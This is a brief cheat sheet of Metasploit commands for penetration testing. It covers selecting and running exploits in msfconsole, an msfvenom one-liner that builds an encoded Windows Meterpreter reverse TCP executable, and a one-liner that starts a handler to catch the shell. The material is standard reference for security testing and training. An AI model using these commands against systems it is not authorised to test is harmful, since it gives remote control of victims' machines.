Metasploit Framework Commands
Metasploit Exploitation Commands
The Metasploit Framework is a powerful tool for penetration testing and exploit development. Below are common commands used within the Metasploit console (msfconsole) and for payload generation (msfvenom).
Basic Exploitation Workflow
This section covers the fundamental steps to select, configure, and run an exploit.
# To show all exploits that match a vulnerability
grep <vulnerability> show exploits
# To select an exploit to use
use <exploit>
# To see the current settings for a selected exploit
show options
# To see compatible payloads for a selected exploit
show payloads
# To set the payload for a selected exploit
set payload <payload>
# To set a specific option for a selected exploit
set <option> <value>
# To run the exploit
exploit
Payload Generation with msfvenom
msfvenom is used to generate standalone payloads. This example creates a Windows Meterpreter reverse TCP payload.
# One-liner to create/generate a payload for Windows
msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_tcp LHOST=<listening_host> LPORT=<listening_port> --bad-chars “\x00” --encoder x86/shikata_ga_nai --iterations 10 --format exe --out /path/to/payload.exe
Setting up a Listener with msfconsole
This command configures Metasploit to listen for incoming connections from a generated payload.
# One-liner to start a Meterpreter handler
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <listening_host>;set LPORT <listening_port>;run;"